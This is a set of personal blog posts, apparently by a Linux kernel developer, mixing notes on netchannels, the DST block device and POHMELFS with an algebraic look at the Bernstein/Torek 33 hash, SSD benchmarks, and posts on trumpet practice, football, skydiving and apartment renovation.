locking and then distributed facilities. Stay tuned, new version will be extremely cool in this regard!
Network channel
is a peer-to-peer, protocol-agnostic communication channel
between hardware and userspace. It uses a unified cache to store its
channels. All protocol processing happens in process context.
This release brings us reworked (and very simple) unified
storage for all kinds of protocols (netchannel can be created for any kind
of protocol), completely lockless data processing
(data queueing into the netchannel and its lookup in the global
storage are protected by RCU), and a simplified interface.
Feature list:
Very high bulk performance with small packets
(check userspace network stack
for more details).
Completely lockless netchannel processing (packet queueing and netchannel lookup in the global storage are protected by RCU).
Unified storage for all kinds of protocols: TCP/UDP, IP/IPv6, whatever you decide to implement on top of hardware layer you use.
No protocol processing. This is pushed to the peer itself. For example to the
userspace network stack.
Ability to inject packets into the network without root privileges.
Unetstack
is an extremely small and fast TCP/UDP/IP stack implementation on top of packet socket or
netchannels interface.
This release includes sync with the new netchannels interface and
drops routing table support: the userspace network stack is designed
for netchannels, and thus effectively a single opened object operates
with a single source and a single destination peer, so there is no need to
introduce unneeded caches, since all needed information can be stored in
the userspace network stack object itself.
Or is it correct to write 'trumpeting in Bb'? When I play
some piano notes from the original scripts, it sounds as expected
(maybe lower because of the trumpet pitch, what I'm trying to figure out),
but I wonder, if playing the same note in trumpet pitch is correct?
For example trumpet C is actually a piano Bb, so when I see
C note in the piano script I play trumpet C, which produces Bb sound,
which may be wrong.
Another problem is melodies where sound flows between two octaves in a single
part. When I play 'He's a pirate' from the small octave to the first one, it sounds
good, but when I rise from the first to the second octave, I rarely can play second F
and higher (well, I rarely play a single sound higher than 2F anyway),
although I can quite reliably produce a single 2F, maybe even 2G if not too tired.
But not in a melody.
Actually I can play a scale up to and down from 2F easily, but not when the previous sounds
do not form a simple ascending or descending sequence. Of course I understand that my
several-month-old 'skills' are not mature yet, but I would like to find where the problem is.
Daily 1-1.5 hour exercises just make lips tired, it looks like progress has stalled.
Need to check Louis Maggio's brass book for the answers :)
When a NIC's interrupt fires in Linux, the driver's handler
does not process the packet: it either schedules the NAPI handler,
which will push the packet higher up the stack, or submits the packet to
the software interrupt handler, which will do the same. This is
the first queue: interrupt->software interrupt (or NAPI, which
happens in the same context).
When NAPI polling handler (or networking software interrupt) fires,
it searches for the appropriate receiving socket, adds data packet
to its queue and wakes up a receiving process. This is second queue.
Netchannels currently work the same way, since their receive processing
happens in netif_receive_skb(), which may already be too late
for some low-latency applications.
As was noticed by Salvatore Del Popolo, it is possible to queue packet
into netchannel in netif_rx(), but that will limit netchannels to
only work with non-NAPI drivers. Instead I think about creating a special
helper which will be invoked from the interrupt handler and if there is no
appropriate netchannel to queue data into, it will schedule NAPI or network
softirq. So far this is in todo list though.
What was really done is a complete rework of the initialization process,
netchannel creation and allocation, and its processing. Essentially I rewrote most
of the netchannels subsystem for good. It became lockless (RCU protected;
there is a hash bucket lock, which is only used when a netchannel is added to or removed
from the bucket, searching is lockless), but the allocation process
is slower, since a netchannel now contains an array of skb pointers, which is allocated
at creation time. The size of the array is limited to the maximum number of packets a netchannel
can hold, a kind of queue size.
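The fixed array of packet pointers can be pictured as a small ring queue. This is only an illustrative userspace sketch: nc_queue, NC_QUEUE_LEN and the helper names are hypothetical, void pointers stand in for skb pointers, and the RCU protection and memory barriers of the real kernel code are not modelled at all.

```c
#include <stddef.h>

#define NC_QUEUE_LEN 8   /* hypothetical queue size; must be a power of two */

struct nc_queue {
    void *slots[NC_QUEUE_LEN];  /* stands in for the array of skb pointers */
    unsigned head;              /* index of the next slot to read */
    unsigned tail;              /* index of the next slot to write */
};

static void nc_queue_init(struct nc_queue *q)
{
    q->head = q->tail = 0;
}

/* Queue one packet; returns 0 on success or -1 when the array is full. */
static int nc_queue_put(struct nc_queue *q, void *pkt)
{
    if (q->tail - q->head == NC_QUEUE_LEN)
        return -1;
    q->slots[q->tail % NC_QUEUE_LEN] = pkt;
    q->tail++;
    return 0;
}

/* Dequeue the oldest packet; returns NULL when the queue is empty. */
static void *nc_queue_get(struct nc_queue *q)
{
    void *pkt;

    if (q->head == q->tail)
        return NULL;
    pkt = q->slots[q->head % NC_QUEUE_LEN];
    q->head++;
    return pkt;
}
```

The array is allocated once, so queueing a packet never allocates memory; the price is the fixed upper bound on the number of packets held.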
Or finish one. Depending on the point to look from.
zbr@gavana$ make SUBDIRS=net/core/netchannel/
WARNING: Symbol version dump /home/zbr/aWork/git/linux-2.6/linux-2.6.netchannels/Module.symvers
is missing; modules will have no dependencies and modversions.
CC net/core/netchannel/netchannel.o
CC net/core/netchannel/storage.o
CC net/core/netchannel/user.o
LD net/core/netchannel/built-in.o
Building modules, stage 2.
MODPOST 0 modules
zbr@gavana$ wc -l net/core/netchannel/*.c include/linux/netchannel.h
430 net/core/netchannel/netchannel.c
140 net/core/netchannel/storage.c
244 net/core/netchannel/user.c
92 include/linux/netchannel.h
906 total
I want to make a new netchannels
release this weekend. It will not contain a dynamically resizable hash table though, but if there are no major
bugs in the core, I will consider completing it for the next release.
I also plan to convert userspace network stack
to the libtcp.so or libunetstack.so library, so it could be much easier to create applications
with this stack, no matter if implemented on top of netchannels or packet socket, but so far it is only in plans.
Although it will be released only next week, good people shared it with me.
What can I say: I did not buy previous one, I think after
"Garage Inc" and "Symphony Metallica" they made real crap, including "St. Anger",
but "Death Magnetic" is better. Much better.
It sounds somewhat similar to "Reload", but unfortunately there are no killing
songs like "Fuel" and "The Unforgiven 2", which, in my opinion, were the best songs on that album,
although there is a song with piano intro. Called "The Unforgiven 3".
Nevertheless "Death Magnetic" is a good album. Not the best, not something new or exceptional,
just good.
That's how my self-made table looks.
It was made out of an old wooden entrance door. The table's geometry is roughly 2000x1500 mm.
Table has single steel leg (I thought to continue it to the
ceiling and put some shelves on it, but it is future development,
if will be started at all) and is attached to the wall and was made
as windowsill continuation.
Now I need to get a good computer chair and install several book shelves on top
of the left side of the table (which is located at the left of the window on
the picture), since books and prints are scattered all over the room.
While searching for wood screws in the cellar, I found a special ceramic tile
drill, and although I'm pretty sure it will not be enough to drill lots of holes
in my tiles, I will be able to create 2-4 holes for the shower cabin and shower
guide.
Also finished bottle X-shelves.
Will install them later though. Also I do not have enough bottles (of whatever) to fill it right now,
there are 24 cells in the shelves.
Exploit
takes multiple hash values and searches for data which will produce the same hash
value (it prints it to stdout as one can see above).
Since this hash is so simple, it is actually possible to find matching
data using brute force, but it is not interesting.
Exploit can not work if we limit the smallest byte value to something other than 1 or 0.
Since we do not know the actual value of the hash, but only its value modulo 2^32,
there is a possibility that a given value can not be represented as a sum with
fixed multipliers of the bytes we can operate on (like we can
not represent 13 as a sum of whatever positive integers, if the smallest one is bigger
than 6). But it is always possible to
represent any value in the system where the smallest possible byte is zero.
Because of the above limitation for the smallest byte value, every hash can be
matched by an array of at most 7 bytes (33^7 is bigger than 2^32).
I want to think some more on the cases when we know only the result modulo 2^32
(the remainder after dividing the real result by 2^32, for example), but we have to find input bytes,
so that the hash of them would match the required one, and input bytes are limited to some
set, and the smallest byte is not 1 or 0. This can be a tricky task...
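One simple way to see the 7-byte bound, sketched under the assumption that bytes 0..32 are allowed (so the smallest byte is zero): the base-33 digits of the target value are themselves a matching input. This is an illustration, not the exploit discussed above; hash33() is a length-based variant of the hash so that zero bytes can be part of the input, and preimage33() is a hypothetical helper name.

```c
#include <stdint.h>
#include <stddef.h>

/* Length-based variant of the multiply-by-33 hash, reduced modulo 2^32. */
static uint32_t hash33(const unsigned char *data, size_t n)
{
    uint32_t h = 0;
    size_t i;

    for (i = 0; i < n; i++)
        h = h * 33 + data[i];
    return h;
}

/*
 * Writes 7 bytes, each in the range 0..32, whose hash33() equals `target`.
 * The bytes are the base-33 digits of `target`, most significant first;
 * 7 digits are always enough because 33^7 > 2^32.
 */
static void preimage33(uint32_t target, unsigned char out[7])
{
    int i;

    for (i = 6; i >= 0; i--) {
        out[i] = (unsigned char)(target % 33);
        target /= 33;
    }
}
```

No wraparound modulo 2^32 is needed here, which is why the restricted cases (smallest byte bigger than 1) are the interesting ones.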
value
where initially hash was set to zero, and data[i] means i'th byte of the
input data.
This can also be written as following:
hash = hash + (hash << 5) + data[i];
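In C the shift form needs explicit parentheses, because + binds tighter than <<. A small sketch comparing the two ways to write one step (the function names are made up for this illustration):

```c
#include <stdint.h>

/* One hash step written with the multiplication by 33. */
static uint32_t step_mul33(uint32_t h, unsigned char byte)
{
    return h * 33 + byte;
}

/* The same step written as a 5-bit shift plus the old value: 33*h == (h << 5) + h. */
static uint32_t step_shift5(uint32_t h, unsigned char byte)
{
    return h + (h << 5) + byte;
}
```

Both functions wrap around modulo 2^32 in the same way, so they agree for every input.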
Now, let's take a look at hash analysis.
As we can see, the final hash is a sum of products of powers of 33 and data bytes.
Let's split the sum into neighbouring pairs, like the following (assuming a big enough number of input bytes n):
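Written out as a reconstruction from the hash loop (not the original formula), with a[i] standing for data[i], an even n assumed for the pairing, and everything taken modulo 2^32:

```latex
\begin{aligned}
h &= \sum_{i=0}^{n-1} 33^{\,n-1-i}\, a[i] \pmod{2^{32}} \\
  &= \sum_{j=0}^{n/2-1} 33^{\,n-2-2j}\,\bigl(33\,a[2j] + a[2j+1]\bigr) \pmod{2^{32}}
\end{aligned}
```

Each bracket is one neighbouring pair of the form 33*a[k] + a[k+1] with k = 2j.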
Now let's check a single multiplier using the above shift equation for the multiplication:
33*a[k] + a[k+1] = a[k] + (a[k] << 5) + a[k+1]
Using any other multiplier, which does not result in a[k] + a[k+1],
will lead to a worse distribution, since the number of used bits decreases. A particularly bad (if not the worst)
multiplier is 31, which leads to the following sum:
31*a[k] + a[k+1] = (a[k] << 5) - a[k] + a[k+1]
This hash will have too few active bits, in particular only the difference between neighbouring bytes
will play a role in the final hash production.
Now, getting the history of the hash, namely its part, which tells us that hash was first introduced for strings,
we can conclude, that above 5 bits shift is used to shift a value to the amount of bits needed to put there new
english ASCII character, i.e. shift value could be bigger to work with higher bytes (so that non-zero bits fit
the new space).
Now because of the time shift I made for myself because of the US embassy interview (awake at 5:30 AM, going to sleep at 1:00 AM),
my brain does not allow me to work on big projects, so I will try to create an exploit for this hash
while on the regular several-cups-of-coffee drug. Stay tuned!
I got a visa after a short interview in the USA embassy, so I will be in Portland September 13-20.
Although the consul asked me in Russian about what I will be doing in the USA, what my experience,
education and degrees are, and so on, I somewhat suddenly started to answer in English.
My 'perfect' pronunciation frequently confused even myself,
but the consul seems to have understood something from that flow of sounds. I hope he knows
what filesystems and Linux are now.
Lots of people know about a very old hash, which uses a simple sum and multiplication
technique (works well not only for strings):
    unsigned long hash(const char *s)
    {
        unsigned long h;

        /* Walk the NUL-terminated string: multiply the state by 33, add the next byte. */
        for (h = 0; *s; s++) {
            h *= 33;
            h += *s;
        }
        return h;
    }
This hash appeared in Bernstein's djbdns server quite long ago (although
Dr. Bernstein now favours version with XOR instead of sum), but it looks like
it appeared in comp.lang.c on behalf of
Chris Torek.
I've spent some time on it to determine how it works. One can check clickable picture below to get my thoughts.
Short details below.
Bernstein/Torek hash analysis.
In a nutshell, the Bernstein/Torek 33 hash is a linear combination of the input bytes.
Each input byte is multiplied by a constant value (namely 33 raised to a power equal
to the number of bytes minus the position of the input byte minus one), and then all products are summed.
One can check the C source code.
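The linear form can be checked directly. A minimal sketch, assuming 32-bit arithmetic and a length-based input (the function names are invented for this illustration): the loop version and the explicit sum of powers of 33 give the same value.

```c
#include <stdint.h>
#include <stddef.h>

/* The usual loop: multiply the state by 33, add the next byte, modulo 2^32. */
static uint32_t hash33_loop(const unsigned char *a, size_t n)
{
    uint32_t h = 0;
    size_t i;

    for (i = 0; i < n; i++)
        h = h * 33 + a[i];
    return h;
}

/* 33 raised to the power e, modulo 2^32. */
static uint32_t pow33(size_t e)
{
    uint32_t r = 1;

    while (e--)
        r *= 33;
    return r;
}

/* The same hash as an explicit linear combination: sum of 33^(n-1-i) * a[i]. */
static uint32_t hash33_linear(const unsigned char *a, size_t n)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i < n; i++)
        sum += pow33(n - 1 - i) * a[i];
    return sum;
}
```

A consequence of the linearity: increasing the byte at position i by one changes the hash by exactly 33^(n-1-i) modulo 2^32, whatever the other bytes are.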
It is simple only because all operations are performed in the same field F(2^32) (namely
sum and multiplication, which is effectively the same); if one adds XOR there (like
Dr. Bernstein did in the recent version), it shifts the whole approach to the mix
of F(2^32) and F(2^1) fields, which is a completely different monster.
In the former case, in particular, it is possible to first multiply/sum lots of elements, and
only then apply the modulo operation, while in the latter mixed case it is not easily possible
(well, I'm searching for group algebra books/articles about operations in mixed fields,
so far without much success).
A linear combination of the input bytes allows a very simple way to create an input which will
have whatever output hash value you want. Actually I do not believe in all those attacks
which say: with our technique we managed to reduce something from X to x. Until there
is a working implementation, which does break the appropriate cipher, hash or anything else, it is just
words. I do not have breaking code right now (although I believe that it is simple), so nothing
was broken, and in fact it can be a completely wrong idea :)
But I will develop it to show myself, that my basic algebra skills are still valid...
A while ago I implemented Van Jacobson's idea
of netchannels - peer-to-peer
connection module, which pushed all protocol processing as close to the end peers as possible.
In my first implementation, TCP processing was done in the context of the running process (instead of mostly bottom-half context),
which resulted in slightly better performance. Then I implemented
userspace network stack
as a continuation of this idea. Despite its huge performance improvement, I do not think the particular reason
is the netchannels architecture, but instead the number of syscalls to be made to process a bulk traffic flow
of small packets. Nevertheless it can also be considered a netchannels architecture improvement, which
resulted in such exceptionally good batching abilities.
Now I want to move further: the kernel netchannels side will be made completely lockless and simultaneously
very cache-friendly. As in the first implementation, the idea is not completely mine: the approach I will test
is based on Van Jacobson's array design to store network buffers.
During its lifetime, netchannels got NAT support (actually just to show those people who do not believe
in the netchannels architecture that it is possible to implement filtering and packet mangling), but now I drop it
from the project. Netchannels also got tricky multidimensional trie-based storage, which, after being ported
to the socket core, resulted in a noticeable performance
win, although I did not complete
it to support statistics. Actually the netchannels implementation of this trie is broken, and it required
quite a few steps in the socket code to be fixed.
Now I drop it from the netchannels patchset too and move to the usual hash tables.
I will make RCU locking for them and make the netchannels hash table optionally automatically resizeable.
This feature does not exist in socket hash tables, but right now I want to experiment with a smaller code base,
since the algorithm I have in mind is a bit tricky.
So, there are lots of interesting ideas, which I've started to work on and plan to finish sooner rather than later.
But since I will go to the USA consular department for the interview, and then want to finish apartment development tasks,
and then, hopefully, go to the Kernel Summit and Plumbers conference, it can take quite long... Please
note that I do not forget about other projects.
Code is not dead if not marked appropriately in the TODO list :)
Stay tuned nevertheless!
I have not worked on my apartment development for quite a while
already, and it was not because there is nothing to do, but
instead because of my laziness and lots of other tasks to complete.
Other projects did not suddenly disappear, but today was so cold
for the summer (and where is the global warming, when it is needed?),
that I decided not to go to the office, which I do
every other day.
Today's apartment development included table painting and shower cabin
installation.
Those who have followed my blog for quite a while may remember that I started to
make my own table many many months ago, but now it is closer to being finished
than ever before. The only remaining task is painting the underside and waiting
for the layers to dry. I will then install it to the wall and connect
the single leg. This table will not be moved, since it has only a single leg
and is firmly attached to the walls in the corner.
That is roughly how table will look like.
Color of the left wall is white, back wall
is blue, carpet is somewhat blue too.
Shower cabin installation actually was not planned (just like anything else),
since I have such strong ceramic tiles on the walls that a usual thin drill (6 mm) can
only produce a single hole; it is almost impossible to drill multiple holes,
since the drill becomes blunt. I wanted to go to the hardware store and buy
a number of special drills for this task, but then decided to experiment with
the pobedit drills I have. They are supposed to drill super concrete without problems,
but they failed to work with my ceramic tiles. Well, I killed three drills
and managed to drill 8 holes only, and I needed to first drill a smaller hole (4 mm)
and then extend it with a 6 mm drill. This is the only way to drill my walls :)
Then I needed to drill a concrete wall, but using perforator and
appropriate augers it is not a complex task at all: several seconds for
6 mm hole with essentially any (supported by the auger of course) depth.
Unfortunately to install a shower cabin I need to have 10 holes: two times of 4 holes
to fix the glass wall guides, since there are two fixed walls and single moving one,
and two holes to fix special stabilizing bar, which is used to hold the walls in a different
dimension. But I did not drill the last two holes, since I have no sharp drills anymore and
would not want to drill the concrete walls with perforator at this time (I believe it is
quite late for this kind of work Sunday evening).
That is how my shower cabin will look like ("Cezares Illusion" model). Interior is different of course.
Also filled a number of holes between tiles (which were fixed last time,
when I bought a special rubber hammer) with water-resistant paste. Next time
(it would be great to finish it next week, but as usual it can be postponed for a couple of months)
I will complete the shower cabin installation, finally install my table, paint the appropriate
places and start (or even complete) bricks glueing (well, not bricks themselves, but small tiles
with the appropriate texture) in the kitchen... There are so many things to complete, and although
it really does not require that much time, I still can not finish them.
We are the champions of the world dream championship! (that is how it was
called officially)
What I want to note is that our competitors (even the strongest ones) wrote frankly about the
games. I.e. there was no stuff in the blog entries like "they played unfair" or other
similar crap. Everyone agrees that we won just because we were stronger and arrived only to win.
Games were fair, and we were just stronger. Everyone played just bloody cool, and result is fair.
Let's see, what will be in a month at the return championship :)
Today we had a serious football championship against 3 teams.
After 5 hours of games we won first place. Last year we lost miserably
against our main competitor in this match.
We played a play-off scheme and had the following scores: 8:2 (against the strongest
team except us) and 7:2 in the final of the championship.
These were not very simple matches, since we played indoors for the first time.
But we had a longer football bench (i.e. more players), so we were able to
change players and keep up an overall very fast pace. Also key players
were not too tired to be able to hold the game even at the very end.
I did not score a goal, but had several precise passes which a couple of times
resulted in a goal. Also had several shots on goal, but with no success,
goalkeepers were good.
Actually I do not consider my contribution noticeable, but I found my problems in
the game, and thus can try to fix them in training.
Because of this exceptionally good result (we won against strong competitors and
even people who work against us sometimes :), we consider to seriously continue
our trainings (rivals ask for return match this September, hopefully I will not
be in USA on conferences).
I will post team and match photos tomorrow. Stay tuned!
DST is a block layer
network device, which among others has following features:
Kernel-side client and server. No need for any special tools for data processing (like special userspace applications) except for configuration.
Bullet-proof memory allocations via memory pools for all temporary objects (transaction and so on).
Zero-copy sending (except header) if supported by device using sendpage().
Failover recovery in case of broken link (reconnection if remote node is down).
Full transaction support (resending of the failed transactions on timeout or after reconnect to the failed node).
Dynamically resizeable pool of threads used for data receiving and crypto processing.
Initial autoconfiguration. Ability to extend it with additional attributes if needed.
Support for any kind of network media (not limited to tcp or inet protocols) above the MAC layer (socket layer).
Out of the box kernel-side IPv6 support (needs to extend configuration utility, check how it was done in
POHMELFS).
Security attributes for local export nodes (list of allowed to connect addresses with permissions). Not used currently though.
Ability to use any supported cryptographically strong checksums. Ability to encrypt data channel.
Distributed storage was completely rewritten from scratch recently. I dropped features that essentially
mirrored the device mapper in favour of more robust block IO processing
and an effective protocol.
One can grab sources (various configuration examples can be found in 'userspace' dir) from
archive,
or via
kernel and
userspace
GIT trees.
And spikes showed that I bought them not for nothing.
Contact with the field was exceptionally good even on very
slick grass, I was able to accelerate and stop really
quickly from essentially all positions. Spikes do not disturb
the hit, although I had not that many possibilities to test it.
And then started the rain. Sometimes it was quite good waterfall with the
strong wind and effectively zero vision where there were no special
field lights (we even moved to the neighbour field because of that).
And you know, I did not even notice that contact with the field changed.
It was exceptionally cool to play in such conditions. One could not go
without contacts and small traumas of course. Well, now I can run on the field
noticeably faster, so contacts become more dangerous, but that's actually
not a problem, I like it.
I've committed changes from Varun Chandramohan (varunc_linux.vnet.ibm.com)
which extend POHMELFS
to support ADD/REMOVE/SHOW configuration groups.
Configuration group is a global object inside pohmelfs core, which contains information about
servers to work with and various configuration parameters. When administrator mounts new pohmelfs
filesystem, he or she has to setup appropriate configuration group and use its index as mount
option parameter. There is special configuration utility for this purpose inside
POHMELFS userspace package.
Now it is possible not only to add or remove groups, but also to show them to the administrator.
I've pushed changes into the kernel
and userspace
GIT trees.
One minute of free fall from a height of 4 km, the wing parachute opened after we fell to 1.6 km.
We whirled several times during free fall and then made number of figures
with the parachute. I drove the wing to make several simple figures with quite heavy turns around.
Of course I actually was just a piece of meat linked to the instructor, who really
did all complex parts namely parachute opening, heavy rotations and landing, but it
was my first jump and that was exceptionally cool! I'm sure I will jump again in
Aerograd, but this
time not linked to the instructor but myself (with instructors in the air though).
More photos in the gallery.
There are also two videos (DVD format):
Aerograd promo (185 MB) and
a bit clumsy video of my
jump itself (474 MB).
Stupid youtube says that I'm 'ineligible' for that service, so there is no compressed version.
Here we go,
DST
got all problems with reference counters fixed. There is a somewhat new observation
I made for myself: a block device has to provide open and release callbacks in its block device
operations structure, which have to increase and decrease the appropriate reference counters
of the underlying object, since otherwise it is possible to remove it
with proper del_gendisk(), blk_cleanup_queue() and put_disk(),
while some references still exist in the mapping (like in the block device info structure),
so a subsequent sync will crash the machine. Also tested lots of reconnection stuff, transaction
resending, timeouts and so on.
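The reference counting rule can be illustrated with a tiny userspace model. This is not kernel code and not the DST implementation: disk_model and its helpers are hypothetical names, and the real open and release callbacks have kernel-specific signatures that are not reproduced here.

```c
/* Hypothetical model of the object behind an exported block device. */
struct disk_model {
    int users;    /* number of openers, changed by open/release */
    int removed;  /* set once removal of the device was requested */
    int freed;    /* set when the underlying object was really destroyed */
};

/* Model of the open callback: take a reference on the underlying object. */
static void disk_model_open(struct disk_model *d)
{
    d->users++;
}

/* Model of the release callback: drop the reference, free on the last one. */
static void disk_model_release(struct disk_model *d)
{
    if (--d->users == 0 && d->removed)
        d->freed = 1;
}

/* Model of device removal: the object is freed only when nobody holds it. */
static void disk_model_remove(struct disk_model *d)
{
    d->removed = 1;
    if (d->users == 0)
        d->freed = 1;
}
```

Without the counter, removal would free the object immediately, and a later sync through a still-open device would touch freed memory.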
Actually I would make a new release, but decided to test crypto stuff first. It was copied
from POHMELFS
and should work out of the box, but this requires an additional check of course.
Since tomorrow I will have an almost minute-long free fall from a height of several kilometers
if weather permits, checks, bug fixes and the release
are postponed until the start of the week.
Obviously if there are no 'issues' with landing...
That was somewhat strange playing. I managed to play small octave C# (trumpet Eb), which is beyond
official range, and third E-F (trumpet Gb-G), which are the highest tones in the official trumpet
range. It was not very reliable of course, although third C was played lots of times.
I do not know how I managed to sound them, but I did. Maybe because of two day delay in morning
exercises (what the heck, I can not wake up as early as usual for the last several days).
But when I started to play some melodies (namely
"He's a pirate"
main theme in the 1-2 octaves, second noteset moved to 1A, i.e. one octave higher),
I managed to tire my lips so quickly, that the same 10-20 first notes (not counting the introduction)
of the theme sounded cool only a couple of times, although I 'played' for about an hour.
Strange. Also found that my sounds are not clean (at least in the first octave), since they
also contain sound of the breathing itself, but I noticed it at the end of the exercises, so likely
I was just too tired at the end. But I will continue.
There is a lot of hype around SSDs these days... People frequently believe that it is a panacea for
hard drive problems related to random disk access. Let's see how high-end SSDs behave compared
to SAS disks.
dirty_writeback_centisecs VM sysctl was set to 3000.
First, single disk performance: SAS vs SSD.
Sequential access speed (both reading and writing) is almost 20% higher for SAS disk than that of SSD.
But let's look at random access speed.
SSD reading jumps to the maximum theoretical 100-120 MB/s plateau very quickly (impressive peaks at 64 and 128 KB,
which can tell us a bit about how the firmware structures the data blocks),
the SAS disk is definitely a loser here, since it reaches its maximum performance numbers only at 8-16 MB records.
But SSD random writing is more than two times slower than that of SAS until the latter reaches its maximum performance.
It is also very interesting to note that sequential access is actually noticeably slower than the maximum random access speed for SSD.
Now let's check two-SSD-disk SW RAID-0 array performance with different stripe size.
Random read peaks move around depending on stripe size.
So clearly if your workload depends on random writing, SSD may not be an appropriate solution,
while it is definitely the winner in random reading workloads. Please also note that it was a high-end
SSD with 0.1 ms seek latency, and right now most of the popular SSDs do not have such shiny numbers.
Great thanks to Vladislav Seliverstov for his data and analysis.
I have heard so many proud words about how ebooks look and that they allow you
to replace your whole library with a single flash drive.
It can not. It does not know about PDF and DJVU formats. Sony Ebook reader,
Lbook V3, Amazon Kindle - all of them can show such a file as a picture at best. And it would
probably be not that bad, but none of them supports scrolling, so there is virtually no way
to read PDF or DJVU formats there. My whole library contains only those formats.
I naively thought that we live in the 21st century, when we can fly faster than the speed of sound every day,
look into the deepest corners of the universe, taste Mars' salt, search for the Higgs boson and convert from any text representation
format to another one. Obviously I was so mistaken...
Will use old-school paper books (I love it much more than electronic ones anyway) and printed
stack of paper for various articles.
I did not yet test crypto processing (and there is no crypto autonegotiation
yet, I will extend automatic configuration protocol to allow nested attributes,
so it could be extended in the future if there will be any need for new parameters to be
synced between client and server). Also server side does not check security attributes
during connection (like read/write per-address permissions).
Because of excessive logging there was no possibility to check performance issues,
and the logging in turn resulted in too frequent stale transaction timer fires, excessive resending
and so on, so I introduced a maximum amount of work to be done in each scan. With this
change I was able to successfully create an ext3 filesystem on 8Gb storage connected
over a 3 MB/s link to the remote node.
There is also an issue with a broken connection: the system tries to reconnect to the server
and does not allow unloading the module if there are pending block requests;
each transaction has a maximum number of retries, so the system waits until each one reaches zero,
which may take too long. This may or may not be a good idea actually, but I think I will
implement transaction flushing during module unloading. Server node has the same issues if there
are pending blocks requested by client and yet not sent.
And although it sounds like a lot of work, it actually is not. I just need not to digress,
which is the most complex part :)
And especially how multiplication and division are performed in finite fields.
So far I run subtraction in a loop to implement modular division in 2^32 field,
which is a bit ugly.
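For reference, here is a minimal sketch of division in a prime field GF(p) without any subtraction loop: division is multiplication by the modular inverse, and the inverse comes from the extended Euclidean algorithm. Note the assumption: the modulus here is the prime 2^31 - 1, chosen only for illustration, since arithmetic modulo 2^32 itself does not form a field (even numbers have no inverse there).

```python
P = 2**31 - 1  # a Mersenne prime, used here only as an example modulus

def mod_inverse(a, p):
    """Return x such that (a * x) % p == 1, via the extended Euclidean algorithm."""
    a %= p
    if a == 0:
        raise ZeroDivisionError("zero has no inverse in GF(p)")
    old_r, r = a, p
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    # old_r is gcd(a, p), which is 1 when p is prime and a != 0
    return old_s % p

def mod_div(a, b, p):
    """Compute a / b in GF(p) as a * b^-1."""
    return (a % p) * mod_inverse(b, p) % p
```

Multiplication in GF(p) is just `(a * b) % p`; fields of size 2^n use polynomial arithmetic instead and are not covered by this sketch.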
Please drop me a link in the comments or send me a
mail, I have a very interesting idea in mind
about some hash analysis. Well, I need to think about something before going to sleep
or while in transit :)
That was an excellent game. And although I did not score any goal this time (we won
with a 6:5 score after 1.5 hours of the game, there were two teams of 7),
it was exactly me who made our defence very strong (well, I was
the only full-back player). That was not that complex: just warm up
before the game so that I had enough breathing power for the whole match, and
resist the temptation to run to the opposite goal each time, or at least
quickly return and stop the attack at the beginning. A couple of goals I actually
helped to score with precise passes (I think my legs started to recall it),
but I have to admit that two goals into
our net are on my conscience: I did not return quickly enough and made a serious
defence mistake...
I could even have scored a couple of goals, but I prefer to think that I failed because
I still do not have cleats, so it was hard to move on the grass and accelerate
really fast. My head game was quite precise (well, not always though),
which is only possible without glasses, so I stopped playing in them
a couple of games ago. And it indeed produces very good results.
As usual I got some foot damage, but I already think that it is quite a small
problem, since the pain stops in just a day or two.
I actually was wrong when I talked about the problems distributed storage
may have with non-page-aligned vectors inside a single block request. Actually neither client
nor server should know how the other peer works with a given block request. The only
thing which should be transferred between the peers is the start of the request and its size.
And of course flags and operation mode (i.e. automatic sync/barrier support and read/write operation).
That's it. The server will allocate as many pages for the request as needed for its own page size,
and the client will also process them just like a contiguous flow of bytes coming out of the network pipe,
which are then placed into the number of pages the client was asked to read or write. Simple.
A BIO can not have holes inside it, but it can have multiple pages
that are partially filled. And this information should not be shared between the nodes at all.
Which basically means that I do not even need to think about how to handle these problems and can just
complete the protocol between the peers. Stay tuned!
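A small sketch of why only the size has to travel over the wire: each peer cuts the same byte stream into pieces using its own page size, and the receiver scatters the stream into whatever partially filled pages it has locally. The helper names (`page_chunks`, `scatter`) and the (offset, length) tuples are assumptions for illustration, not DST structures.

```python
def page_chunks(size, page_size):
    """Split a request of `size` bytes into chunk lengths for local pages."""
    chunks = []
    remaining = size
    while remaining > 0:
        length = min(page_size, remaining)
        chunks.append(length)
        remaining -= length
    return chunks

def scatter(stream, vectors, page_size):
    """Copy a contiguous byte stream into (offset, length) slots of local pages."""
    pages = [bytearray(page_size) for _ in vectors]
    pos = 0
    for page, (offset, length) in zip(pages, vectors):
        page[offset:offset + length] = stream[pos:pos + length]
        pos += length
    return pages
```

For a 10000 byte request a peer with 4096 byte pages needs three pages and a peer with 16384 byte pages needs one, yet both agree on the same flow of bytes.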
Well, it was not really a musical jam, since he played piano (an unbelievably cool
electronic Yamaha) and I just listened, and only a couple of times produced some sounds
on my trumpet. I am clearly not in shape to play 'on demand' right now, I'm too
young as a musician :)
We agreed that although an electronic piano can sound very fancy,
no matter how cool it is, it still sounds worse than a real acoustic one.
I want to get one (and to start taking lessons with a teacher) sooner or later (and not
particularly soon, just thinking),
and I really only like the genuine piano sound without all that electronic fuzz around,
so I will think some more about the possibility of getting a real piano for my loft.
Grange is playing his electronic piano
Late at night we drank a bit and played chess. We finished after 5 A.M.
and had a 1:1 score after two games. You know, it was quite fun,
although the brain did not allow thinking too deep into the game, so the starting idea quickly got confused,
then suddenly after a couple of moves a new one appeared, then moved into the shadow and so on.
The single game I lost was quite miserable: such stupid errors... :)
Masha and Grange
Masha was not particularly happy about our late drinking game, but she and a soon to be born kid
(ugh, they do not want to know who it will be)
went to sleep early - they do not like sport :)
I think we need to repeat it eventually, it was a great time!
Trying this monster. It is the vocal part of the Russian national anthem,
and since I do not understand how a voice (and a trumpet) can sound chords, I selected the higher part
where needed.
Sometimes it sounds not that bad, although it is definitely not very good. What would you
expect from less than 3 months of trumpet learning...
Basically I can not play the whole part, since closer to the end my lips become too tired, so
I need a small break, which definitely does not exist in the rhythm. Also I do not know
half of the signs in this sheet music (well, I can not read music at all),
so I just play how I want it to sound with appropriate notes,
since I know the rhythm and usually also each note duration.
I also tried the sheet music for Armstrong's "What a wonderful world", but since I do not know the rhythm and do not
have an accompaniment, it was not interesting, although I think it is a bit simpler than the anthem.
I will try to find that song and check how I can play it.
DST testing revealed a number of bugs, which could be easily fixed if I did not need
to debug essentially two separate subsystems of the DST: client and server. Both
share lots of code, but it is quite problematic to find who broke the protocol
when one of them starts complaining.
So far peers can connect and start the initial data exchange, but there is a major problem
